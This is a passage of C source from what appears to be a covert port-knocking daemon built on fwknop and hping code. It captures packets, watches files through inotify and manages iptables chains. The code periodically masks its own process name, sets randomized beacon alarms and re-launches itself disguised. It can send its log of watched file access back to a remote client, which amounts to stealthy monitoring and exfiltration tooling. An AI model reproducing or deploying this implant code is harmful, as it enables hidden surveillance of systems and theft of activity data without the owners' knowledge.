                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "directory %s accessed", titem);
                    } else {
                        sprintf(logmsg, "file %s accessed", titem);
                    }
                } else if (ev->mask & IN_MOVED_FROM) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "directory %s moved out (#%d)", titem, ev->cookie);
                    } else {
                        sprintf(logmsg, "file %s moved out (#%d)", titem, ev->cookie);
                    }
                } else if (ev->mask & IN_MOVED_TO) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "directory %s moved in (#%d)", titem, ev->cookie);
                    } else {
                        sprintf(logmsg, "file %s moved in (#%d)", titem, ev->cookie);
                    }
                } else if (ev->mask & IN_MOVE_SELF) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "directory %s (self) moved", titem);
                    } else {
                        sprintf(logmsg, "file %s (self) moved", titem);
                    }
                } else if (ev->mask & IN_UNMOUNT) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "directory %s unmounted", titem);
                    } else {
                        sprintf(logmsg, "file %s unmounted", titem);
                    }
                } else if (ev->mask & IN_IGNORED) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "directory %s gone/ignored", titem);
                    } else {
                        sprintf(logmsg, "file %s gone/ignored", titem);
                    }
                } else if (ev->mask & IN_Q_OVERFLOW) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "directory %s events lost", titem);
                    } else {
                        sprintf(logmsg, "file %s events lost", titem);
                    }
                } else {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "unrecognized directory %s event", titem);
                    } else {
                        sprintf(logmsg, "unrecognized file %s event", titem);
                    }
                }
                logit(_LOG_INFO, logmsg, 0);
                if (pLog) {
                    logfileit(_LOG_INFO, logmsg, pLog, 1);
                }
            }
            ofs += sizeof(struct inotify_event) + ev->len;
            if (get_inotifycount() > 0) {
                //
                // expiry count (events) set for watching
                //
                if (get_inotifyevents() >= get_inotifycount()) {
                    watch_aborted = TRUE;
                    sprintf(logmsg, "max %d count inotify events reached", get_inotifycount());
                    logit(_LOG_INFO, logmsg, 0);
                    if (pLog) {
                        logfileit(_LOG_INFO, logmsg, pLog, 1);
                    }
                    break;
                }
            }
            if (get_inotifyexpiry() > 0) {
                //
                // expiry time (seconds) set for watching
                //
                struct timeval tprun;
                gettimeofday(&tprun, NULL);
                double time_snapshot = tprun.tv_sec+(tprun.tv_usec/1000000.0);
                if ( (time_snapshot-get_inotifywatchdog()) >= (double)get_inotifyexpiry() ) {
                    watch_aborted = TRUE;
                    sprintf(logmsg, "max %d seconds inotify expiry reached", get_inotifyexpiry());
                    logit(_LOG_INFO, logmsg, 0);
                    if (pLog) {
                        logfileit(_LOG_INFO, logmsg, pLog, 1);
                    }
                    break;
                }
            }
        }
    }
    if (pLog != NULL) {
        sprintf(logmsg, "inotify %s event watching stopped", (char *)get_inotifytarget());
        logfileit(_LOG_INFO, logmsg, pLog, 1);
        fclose(pLog);
    }
}
//
/* The pcap capture routine.
*/
int
pcap_capture_inviz(int close_when_done) {
    char                errstr[PCAP_ERRBUF_SIZE] = {0};
    int                 res;
    int                 pcap_errcnt = 0;
    int                 pending_break = 0;
    int                 status;
    pid_t               child_pid;
    //time_t              now;
    struct              timeval tprun;
    double              time_snapshot;
    char                logmsg[512];
    //
    // pcap device and struct already determined and ready to use
    //
    /* Set our pcap handle nonblocking mode.
     *
     * NOTE: This is simply set to 0 for now until we find a need
     *       to actually use this mode (which when set on a FreeBSD
     *       system, it silently breaks the packet capture).
    */
    if (get_usefkopcap()) {
        // this may be causing problems ...
        if((pcap_setnonblock(get_pcapstruct(), DEF_PCAP_NONBLOCK, errstr)) == -1) {
            sprintf(logmsg, "unable to pcap_setnonblock() to %i [%s]", DEF_PCAP_NONBLOCK, errstr );
            logit(_LOG_ERROR, logmsg, 0);
            return(EXIT_FAILURE);
        }
    }
    //
    /* Initialize our signal handlers. You can check the return value for
     * the number of signals that were *not* set.  Those that we not set
     * will be listed in the log/stderr output.
    */
    if(set_sig_handlers_inviz() > 0) {
        sprintf(logmsg, "errors encountered when setting signal handlers");
        logit(_LOG_WARNING, logmsg, 0);
    }
    if (get_verbose()) {
        logit(_LOG_INFO, "starting port knocking listener event loop...", 0);
    }
    if (get_pkbeacon()) {
        int secs = ((rand() % (get_pkbeaconmaxinterval() - get_pkbeaconmininterval()) ) + get_pkbeaconmininterval());
        alarm(secs); // set alarm
        if (get_verbose()) {
            sprintf(logmsg, "port knocking beacon alarm set to %d seconds", secs);
            logit(_LOG_INFO, logmsg, 0);
        }
    }
    //
    /* Jump into our home-grown packet capture loop.
    */
    while(!sig_interrupted) {
        //
        /* If we got a SIGCHLD and it was the tcp server, then handle it here.
        */
        if(got_sigchld) {
            if(get_tcpserverpid() > 0) {
                child_pid = waitpid(0, &status, WNOHANG);
                if(child_pid == get_tcpserverpid()) {
                    if(WIFSIGNALED(status)) {
                        sprintf(logmsg, "TCP server got signal (%i)",  WTERMSIG(status));
                        logit(_LOG_WARNING, logmsg, 0);
                    }
                    sprintf(logmsg, "TCP server exited with status %i - attempting restart", WEXITSTATUS(status));
                    logit(_LOG_WARNING, logmsg, 0);
                    //
                    set_tcpserverpid(0);

                    /* Attempt to restart tcp server ? */
                    usleep(1000000); // what?!
                    run_tcp_server_inviz();
                }
            }
            got_sigchld = FALSE;
        }
        //
        /* Any signal except USR1, USR2, and SIGCHLD mean break the loop.
        */
        if(got_signal) {
            if(got_sigint || got_sigterm || got_sighup || got_sigalrm) {
                pcap_breakloop(get_pcapstruct());
                pending_break = TRUE;
            } else if(got_sigusr1 || got_sigusr2) {
                //
                /* Not doing anything with these yet.
                */
                got_sigusr1 = got_sigusr2 = FALSE;
                got_signal = FALSE;
            } else {
                got_signal = FALSE;
            }
        }
        //
        // now go into pcap listening loop
        //
        unsigned char * user = 0x0;
        int packet_count = 1;
        if (get_usefkopcap()) {
            //
            // use fwknop pcap
            // returns int number of packets processed on success
            //
            res = pcap_dispatch(get_pcapstruct(), packet_count, (pcap_handler)&process_packet_inviz, user);
        } else {
            // use hping pcap
            pcap_recv_index = 0;
            res = pcap_loop(get_pcapstruct(), packet_count, pcap_server_packet_callback, user);
        }
        //
        //
        //
        if (get_randomizepsmask() && (INVIZ_PSMASK_TIMER > 0)) {
            gettimeofday(&tprun, NULL);
            time_snapshot = tprun.tv_sec+(tprun.tv_usec/1000000.0);
            if ((time_snapshot - get_randomizepstimer()) >= (double)INVIZ_PSMASK_TIMER) {
                // reset random process mask
                set_randompsmask();
                if (get_verbose()) {
                    sprintf(logmsg, "invizible process %i now masked as %s",
                            (int)getpid(),
                            (char *)get_psmask());
                    logit(_LOG_INFO, logmsg, 0);
                }
            }
        }
        //
        /* If there was a packet and it was processed without error, then
         * keep going.
        */
        if( get_usefkopcap() && (res > 0) && (get_spapacketdata()) && (get_spapacketdatalen() > 0) ) {
            res = process_incoming_pkpacket();
            //
            if(res != 0 && get_verbose()) {
                sprintf(logmsg, "incoming port knocking packet error [%s]", get_errstr(res));
                logit(_LOG_INFO, logmsg, 0);
                continue;
            }
            //
            /* Count this packet since it has at least one byte of payload
             * data - we use this as a comparison for --packet-limit regardless
             * of SPA packet validity at this point.
            */
            inc_ipackets();
            if ( get_ipacketlimit() && (get_ipackets() >= get_ipacketlimit()) ) {
                sprintf(logmsg, "incoming packet count limit (%i) reached", get_ipacketlimit());
                logit(_LOG_WARNING, logmsg, 0);
                //
                pcap_breakloop(get_pcapstruct());
                pending_break = 1;
            }
            if (sig_interrupted) {
                break;
            }
            //
            // loop back and listen for another packet
            //
            continue;
        }
        //
        /* If there was an error, complain and go on (to an extent before
         * giving up).
        */
        else if(res == -1) {
            sprintf(logmsg, "error on pcap listening [%s]", pcap_geterr(get_pcapstruct()) );
            logit(_LOG_ERROR, logmsg, 0);
            //
            if(pcap_errcnt++ > MAX_PCAP_ERRORS_BEFORE_BAIL) {
                sprintf(logmsg, "%i consecutive pcap errors - giving up", pcap_errcnt);
                logit(_LOG_ERROR, logmsg, 0);
                exit(EXIT_FAILURE);
            }
        } else if( (pending_break == 1) || (res == -2) ) {
            /* pcap_breakloop was called, so we bail. */
            if (get_verbose()) {
                logit(_LOG_INFO, "gracefully leaving the port knocking listener event loop...", 0);
            }
            break;
        } else {
            pcap_errcnt = 0;
            if ( !get_usefkopcap() && (pcap_recv_index = 0)) {
                //
                // nothing recognized
                // loop back and listen for more
                //
                continue;
            }
        }
        //
        /* Check for any expired firewall rules and deal with them.
        */
        check_firewall_rules_inviz();
        //
#if FIREWALL_IPFW
        //
        /* Purge expired rules that no longer have any corresponding
         * dynamic rules.
        */
        if(opts->fw_config->total_rules > 0)
        {
            time(&now);
            if(opts->fw_config->last_purge < (now - opts->fw_config->purge_interval))
            {
                purge_expired_rules(opts);
                opts->fw_config->last_purge = now;
            }
        }
#endif
        //
        // now watch for inotify events?
        //
        int fd = get_inotifyfd();
        if (fd > 0) {
            set_inotifywatchdog(TRUE); // current time snapshot
            set_inotifyevents(0); // count of watched events so far
            if (get_inotifyfork()) {
                pid_t forkpid = fork();
                if (forkpid < 0) {
                    sprintf(logmsg, "unable to fork inotify event watching process [%s]", strerror(errno));
                    logit(_LOG_WARNING, logmsg, 0);
                } else if (forkpid == 0) {
                    //
                    // is forked child
                    // send it off to do inotify event watching
                    //
                    if (close_when_done) {
                        pcap_close(get_pcapstruct());
                        set_pcapstruct(NULL);
                    }
                    do_inotify_watch(fd);
                    return (EXIT_SUCCESS);
                } else {
                    continue;
                }
            }
            //
            // do blocking read of inotify events here
            //
            do_inotify_watch(fd);
            //
            char pname[MAX_FILENAME_LEN+1];
            memset(pname, 0x0, sizeof(pname));
            strncpy(pname, get_programname(), MAX_FILENAME_LEN);
            //
            char psname[INVIZ_MAX_PSMASK_LEN+1];
            memset(psname, 0x0, sizeof(psname));
            strncpy(psname, get_originalpsname(), INVIZ_MAX_PSMASK_LEN);
            //
            char verbose_parm[strlen(get_quietparm())+1];
            memset(verbose_parm, 0x0, sizeof(verbose_parm));
            if (get_verbose()) {
                sprintf(verbose_parm, "%s", get_verboseparm());
            } else {
                sprintf(verbose_parm, "%s", get_quietparm());
            }
            //
            char log_parm[strlen(get_uselogfileparm())+1];
            memset(log_parm, 0x0, sizeof(log_parm));
            if (get_uselogfile()) {
                sprintf(log_parm, "%s", get_uselogfileparm());
            } else {
                sprintf(log_parm, "%s", get_nologfileparm());
            }
            //
            char pkprivate_parm[strlen(get_pknotprivateparm())+1];
            memset(pkprivate_parm, 0x0, sizeof(pkprivate_parm));
            if (get_pkprivatesubnet()) {
                sprintf(pkprivate_parm, "%s", get_pkprivateparm());
            } else {
                sprintf(pkprivate_parm, "%s", get_pknotprivateparm());
            }
            //
            char pwd_parm[strlen(get_pkpasswordparm()) + strlen(get_pkpassword()) + 1];
            memset(pwd_parm, 0x0, sizeof(pwd_parm));
            sprintf(pwd_parm, "%s%s", get_pkpasswordparm(), get_pkpassword());
            //
            char if_parm[strlen(get_ifnameparm()) + strlen(get_ifname()) + 1];
            memset(if_parm, 0x0, sizeof(if_parm));
            sprintf(if_parm, "%s%s", get_ifnameparm(), get_ifname());
            //
            if (get_inotifylog() && get_inotifyecho()) {
                //
                // send log file back to client
                //
                char filename_parm[MAX_FILENAME_LEN+6];
                memset(filename_parm, 0x0, sizeof(filename_parm));
                sprintf(filename_parm, "-Frm=%s", (char *)get_inotifylog());
                //
                char echodns_parm[MAX_IP6_LEN+4];
                memset(echodns_parm, 0x0, sizeof(echodns_parm));
                sprintf(echodns_parm, "-B=%s", get_inotifyechodns());
                //
                char echokey_parm[INVIZ_MAX_KEYSEED_LEN+4+strlen(INVIZ_KEY_DESC)];
                memset(echokey_parm, 0x0, sizeof(echokey_parm));
                sprintf(echokey_parm, "--"INVIZ_KEY_DESC"=%s", get_inotifyechokey());
                //
                char echoseed_parm[INVIZ_MAX_SEED_LEN+4+strlen(INVIZ_SEED_DESC)];
                memset(echoseed_parm, 0x0, sizeof(echoseed_parm));
                sprintf(echoseed_parm, "--"INVIZ_SEED_DESC"=%d", get_inotifyechoseed());
                //
                char client_parm[MAX_IP6_LEN+4];
                memset(client_parm, 0x0, sizeof(client_parm));
                sprintf(client_parm, "-S=%s", (char *)get_pkclient());
                //
                // also --sleepmax= (or -X=)
                // if --wipe then will not work here because program is gone
                //
                cleanup_parms();
                //
                // try to exec()
                // will replace current process
                //
                sprintf(logmsg, "now will re-launch to send inotify log file (%s) back to %s",
                    filename_parm, client_parm);
                logit(_LOG_INFO, logmsg, 0);
                int ires = execlp(pname,
                        psname,
                        "-C",
                        filename_parm,
                        client_parm,
                        echodns_parm,
                        echokey_parm,
                        echoseed_parm,
                        pkprivate_parm,
                        pwd_parm,
                        if_parm,
                        log_parm,
                        verbose_parm,
                        NULL);
                if (ires < 0) {
                    sprintf(logmsg, "unable to exec() unexpected error %d [%s]",
                        errno, strerror(errno));
                    logit(_LOG_ERROR, logmsg, 0);
                    break;
                }
            } else {
                //
                cleanup_parms();
                //
                // try to exec()
                // will replace current process
                //
                sprintf(logmsg, "now will re-launch to wait for more incoming packets");
                logit(_LOG_INFO, logmsg, 0);
                int ires = execlp(pname,
                        psname,
                        "-S",
                        pkprivate_parm,
                        pwd_parm,
                        if_parm,
                        log_parm,
                        verbose_parm,
                        NULL);
                if (ires < 0) {
                    sprintf(logmsg, "unable to exec() unexpected error %d [%s]",
                        errno, strerror(errno));
                    logit(_LOG_ERROR, logmsg, 0);
                    break;
                }
            }
        }
        //
        //
        //alarm(0); // cancel previous alarm if any
        //usleep(10000); // why?! not good ...
        //if (get_pkbeacon()) {
        //    int secs = ((rand() % (get_pkbeaconmaxinterval() - get_pkbeaconmininterval()) ) + get_pkbeaconmininterval());
        //    alarm(secs); // reset alarm (for beacon)
        //}
        //
    }
    //
    if (close_when_done) {
        pcap_close(get_pcapstruct());
        set_pcapstruct(NULL);
    }
    return( EXIT_SUCCESS );
}
//
#ifdef FIREWALL_IPTABLES
//
//
//
void
zero_cmd_buffers_inviz(void) {
    memset(cmd_buf, 0x0, CMD_BUFSIZE);
    memset(err_buf, 0x0, CMD_BUFSIZE);
    memset(cmd_out, 0x0, STANDARD_CMD_OUT_BUFSIZE);
}
//
// based on fwknop jump_rule_exists()
// parameter int chain number/index
// returns int -1 on failure
// returns int 0 if no jump rule number found
// returns int > 0 if jump rule number to this chain found
//
int
jump_rule_exists_inviz(int chain_num) {
    int     num, pos = 0;
    char    cmd_buf[CMD_BUFSIZE] = {0};
    char    target[CMD_BUFSIZE] = {0};
    char    line_buf[CMD_BUFSIZE] = {0};
    FILE   *ipt;
    char    logmsg[512];

    sprintf(cmd_buf, "%s " IPT_LIST_RULES_ARGS,
        fwc.fw_command,
        fwc.chain[chain_num].table,
        fwc.chain[chain_num].from_chain
    );

    ipt = popen(cmd_buf, "r");

    if(ipt == NULL) {
        sprintf(logmsg, "Got error %i trying to get rules list", errno);
        logit(_LOG_ERROR, logmsg, 0);
        return(-1);
    }

    while((fgets(line_buf, CMD_BUFSIZE-1, ipt)) != NULL) {
        /* Get past comments and empty lines (note: we only look at the
         * first character).
        */
        if(IS_EMPTY_LINE(line_buf[0]))
            continue;

        if(sscanf(line_buf, "%i %s ", &num, target) == 2) {
            if(strcmp(target, fwc.chain[chain_num].to_chain) == 0) {
                pos = num;
                break;
            }
        }
    }

    pclose(ipt);

    return(pos);
}
//
/* Quietly flush and delete all fwknop custom chains.
*/
void
delete_all_chains_inviz(void) {
    int     i, res;
    int     jump_rule_num;
    char    logmsg[512];

    for(i=0; i<(FW_NUM_CHAIN_FIELDS); i++) {
        if(fwc.chain[i].target[0] == '\0') {
            continue;
        }
        //
        /* First look for a jump rule to this chain and remove it if it
         * is there.
        */
        if((jump_rule_num = jump_rule_exists_inviz(i)) > 0) {
            zero_cmd_buffers_inviz();

            snprintf(cmd_buf, CMD_BUFSIZE-1, "%s " IPT_DEL_RULE_ARGS,
                fwc.fw_command,
                fwc.chain[i].table,
                fwc.chain[i].from_chain,
                jump_rule_num
            );

            //printf("CMD: '%s'\n", cmd_buf);
            res = run_extcmd_inviz(0, cmd_buf, err_buf, (size_t)CMD_BUFSIZE, 0);
            /* Expect full success on this */
            if(! EXTCMD_IS_SUCCESS(res)) {
                sprintf(logmsg, "Error %i from cmd:'%s': %s", res, cmd_buf, err_buf);
                logit(_LOG_ERROR, logmsg, 0);
            }
        }

        zero_cmd_buffers_inviz();

        /* Now flush and remove the chain.
        */
        snprintf(cmd_buf, CMD_BUFSIZE-1,
            "(%s " IPT_FLUSH_CHAIN_ARGS "; %s " IPT_DEL_CHAIN_ARGS ")", // > /dev/null 2>&1",
            fwc.fw_command,
            fwc.chain[i].table,
            fwc.chain[i].to_chain,
            fwc.fw_command,
            fwc.chain[i].table,
            fwc.chain[i].to_chain
        );

        //printf("CMD: '%s'\n", cmd_buf);
        res = run_extcmd_inviz(0, (char *)cmd_buf, (char *)err_buf, (size_t)CMD_BUFSIZE, 0);
        /* Expect full success on this */
        if(! EXTCMD_IS_SUCCESS(res)) {
            sprintf(logmsg, "unexpected error %i from command to flush firewall chain (%s) [%s]", res, cmd_buf, err_buf);
            logit(_LOG_ERROR, logmsg, 0);
        }
    }
}
//
/* Create the fwknop custom chains (at least those that are configured).
*/
int
create_fw_chains_inviz(void) {
    int     i;
    int     res, got_err = 0;
    char    logmsg[512];

    for(i=0; i<(FW_NUM_CHAIN_FIELDS); i++) {
        if(fwc.chain[i].target[0] == '\0')
            continue;

        zero_cmd_buffers_inviz();

        /* Create the custom chain.
        */
        snprintf(cmd_buf, CMD_BUFSIZE-1, "%s " IPT_NEW_CHAIN_ARGS,
            fwc.fw_command,
            fwc.chain[i].table,
            fwc.chain[i].to_chain
        );

        //printf("(%i) CMD: '%s'\n", i, cmd_buf);
        res = run_extcmd_inviz(0, cmd_buf, err_buf, CMD_BUFSIZE, 0);

        /* Expect full success on this */
        if(! EXTCMD_IS_SUCCESS(res)) {
            sprintf(logmsg, "Error %i from cmd:'%s': %s", res, cmd_buf, err_buf);
            logit(_LOG_ERROR, logmsg, 0);
            got_err++;
        }

        zero_cmd_buffers_inviz();

        /* Then create the jump rule to that chain.
        */
        snprintf(cmd_buf, CMD_BUFSIZE-1, "%s " IPT_ADD_JUMP_RULE_ARGS,
            fwc.fw_command,
            fwc.chain[i].table,
            fwc.chain[i].from_chain,
            fwc.chain[i].jump_rule_pos,
            fwc.chain[i].to_chain
        );

        //printf("(%i) CMD: '%s'\n", i, cmd_buf);
        res = run_extcmd_inviz(0, cmd_buf, err_buf, CMD_BUFSIZE, 0);

        /* Expect full success on this */
        if(! EXTCMD_IS_SUCCESS(res)) {
            sprintf(logmsg, "Error %i from cmd:'%s': %s", res, cmd_buf, err_buf);
            logit(_LOG_ERROR, logmsg, 0);
            got_err++;
        }
    }
    return(got_err);
}
//
//
//
void
set_fw_chain_conf_inviz(int chain_ndx, char *chain_str) {
    int i, j;
    char tbuf[1024]     = {0};
    char *ndx           = chain_str;
    char logmsg[512];

    char *chain_fields[FW_NUM_CHAIN_FIELDS];

    struct fw_chain *chain = &(fwc.chain[chain_ndx]);

    chain->type = chain_ndx;

    if(ndx != NULL) {
        chain_fields[0] = tbuf;
    }
    i = 0;
    j = 1;
    while(*ndx != '\0') {
        if(*ndx != ' ') {
            if(*ndx == ',') {
                tbuf[i] = '\0';
                chain_fields[j++] = &(tbuf[++i]);
            } else {
                tbuf[i++] = *ndx;
            }
        }
        ndx++;
    }
    //
    /* Sanity check - j should be the number of chain fields
     * (excluding the type).
    */
    if(j != FW_NUM_CHAIN_FIELDS) {
        sprintf(logmsg, "[*] Custom Chain config parse error.\n"
            "Wrong number of fields for chain type %i\n"
            "Line: %s", chain_ndx, chain_str);
        logit(_LOG_ERROR, logmsg, 0);
        exit(EXIT_FAILURE);
    }

    /* Pull and set Target */
    strlcpy(chain->target, chain_fields[FW_CHAIN_TARGET], MAX_TARGET_NAME_LEN);

    /* Pull and set Table */
    strlcpy(chain->table, chain_fields[FW_CHAIN_TABLE], MAX_TABLE_NAME_LEN);

    /* Pull and set From_chain */
    strlcpy(chain->from_chain, chain_fields[FW_CHAIN_FROM_CHAIN], MAX_CHAIN_NAME_LEN);

    /* Pull and set Jump_rule_position */
    chain->jump_rule_pos = atoi(chain_fields[FW_CHAIN_JUMP_RULE_POS]);

    /* Pull and set To_chain */
    strlcpy(chain->to_chain, chain_fields[FW_CHAIN_TO_CHAIN], MAX_CHAIN_NAME_LEN);

    /* Pull and set Jump_rule_position */
    chain->rule_pos = atoi(chain_fields[FW_CHAIN_RULE_POS]);
}
#endif /* FIREWALL_IPTABLES */
//
/* Fork off and run a "dummy" TCP server. The return value is the PID of
 * the child process or -1 if there is a fork error.
*/
int
run_tcp_server_inviz() {
    pid_t               pid, ppid;
    int                 s_sock, c_sock, sfd_flags, clen, selval;
    int                 reuse_addr = 1;
    fd_set              sfd_set;
    struct sockaddr_in  saddr, caddr;
    struct timeval      tv;
    char                sipbuf[MAX_IP_STR_LEN];
    char                logmsg[512];

    unsigned short      port = get_tcpserverport();

    sprintf(logmsg, "Kicking off TCP server to listen on port %i.", port);
    logit(_LOG_INFO, logmsg, 0);

    /* Fork off a child process to run the command and provide its outputs.
    */
    pid = fork();

    /* Non-zero pid means we are the parent or there was a fork error.
     * in either case we simply return that value to the caller.
    */
    if (pid != 0) {
        set_tcpserverpid(pid);
        return(pid);
    }

    /* Get our parent PID so we can periodically check for it. We want to
     * know when it goes away so we can to.
    */
    ppid = getppid();

    /* We are the child.  The first thing to do is close our copy of the
     * parent PID file so we don't end up holding the lock if the parent
     * suffers a sudden death that doesn't take us out too.
    */
    if (get_pidfd()) {
        close(get_pidfd());
    }

    /* Now, let's make a TCP server
    */
    if ((s_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        sprintf(logmsg, "run_tcp_server: socket() failed: %s", strerror(errno));
        logit(_LOG_ERROR, logmsg, 0);
        exit(EXIT_FAILURE);
    }

    /* So that we can re-bind to it without TIME_WAIT problems
    */
    setsockopt(s_sock, SOL_SOCKET, SO_REUSEADDR, &reuse_addr, sizeof(reuse_addr));

    /* Make our main socket non-blocking so we don't have to be stuck on
     * listening for incoming connections.
    */
    if((sfd_flags = fcntl(s_sock, F_GETFL, 0)) < 0) {
        sprintf(logmsg, "run_tcp_server: fcntl F_GETFL error: %s", strerror(errno));
        logit(_LOG_ERROR, logmsg, 0);
        exit(EXIT_FAILURE);
    }

    sfd_flags |= O_NONBLOCK;

    if(fcntl(s_sock, F_SETFL, sfd_flags) < 0) {
        sprintf(logmsg, "run_tcp_server: fcntl F_SETFL error setting )_NONBLOCK: %s", strerror(errno));
        logit(_LOG_ERROR, logmsg, 0);
        exit(EXIT_FAILURE);
    }

    /* Construct local address structure */
    memset(&saddr, 0, sizeof(saddr));
    saddr.sin_family      = AF_INET;           /* Internet address family */
    saddr.sin_addr.s_addr = htonl(INADDR_ANY); /* Any incoming interface */
    saddr.sin_port        = htons(port);       /* Local port */

    /* Bind to the local address */
    if (bind(s_sock, (struct sockaddr *) &saddr, sizeof(saddr)) < 0) {
        sprintf(logmsg, "run_tcp_server: bind() failed: %s", strerror(errno));
        logit(_LOG_ERROR, logmsg, 0);
        exit(EXIT_FAILURE);
    }

    /* Mark the socket so it will listen for incoming connections
     * (but only one at a time)
    */
    if (listen(s_sock, 1) < 0) {
        sprintf(logmsg, "run_tcp_server: listen() failed: %s", strerror(errno));
        logit(_LOG_ERROR, logmsg, 0);
        exit(EXIT_FAILURE);
    }

    clen = sizeof(caddr);

    /* Now loop and accept and drop connections after the first packet or a
     * short timeout.
    */
    while(TRUE) {
        /* Initialize and setup the socket for select.
        */
        FD_ZERO(&sfd_set);
        FD_SET(s_sock, &sfd_set);

        /* Set our select timeout to 200 ms.
        */
        tv.tv_sec = 0;
        tv.tv_usec = 200000;

        selval = select(s_sock+1, &sfd_set, NULL, NULL, &tv);

        if(selval == -1) {
            /* Select error - so kill the child and bail.
            */
            sprintf(logmsg, "run_tcp_server: select error socket: %s", strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
            exit(EXIT_FAILURE);
        }

        if(selval == 0) {
            /* Timeout - So we check to make sure our parent is still there by simply
             *           using kill(ppid, 0) and checking the return value.
            */
            if(kill(ppid, 0) != 0 && errno == ESRCH) {
                exit(EXIT_FAILURE);
            }
            continue;
        }
        //
        /* Wait for a client to connect
        */
        if((c_sock = accept(s_sock, (struct sockaddr *) &caddr, (socklen_t *)&clen)) < 0) {
            sprintf(logmsg, "run_tcp_server: accept() failed: %s", strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
            exit(EXIT_FAILURE); /* Should this be fatal? */
        }

        if(get_verbose()) {
            memset(sipbuf, 0x0, MAX_IP_STR_LEN);
            inet_ntop(AF_INET, &(caddr.sin_addr.s_addr), sipbuf, MAX_IP_STR_LEN);
            sprintf(logmsg, "tcp_server: Got TCP connection from %s.", sipbuf);
            logit(_LOG_INFO, logmsg, 0);
        }

        /* Though hacky and clunky, we just sleep for a second then
         * close the socket.  No need to read or write anything.  This
         * just gives the client a sufficient window to send their
         * request on this socket. In any case the socket is closed
         * after that time.
        */
        usleep(1000000);
        shutdown(c_sock, SHUT_RDWR);
        close(c_sock);
    }
}
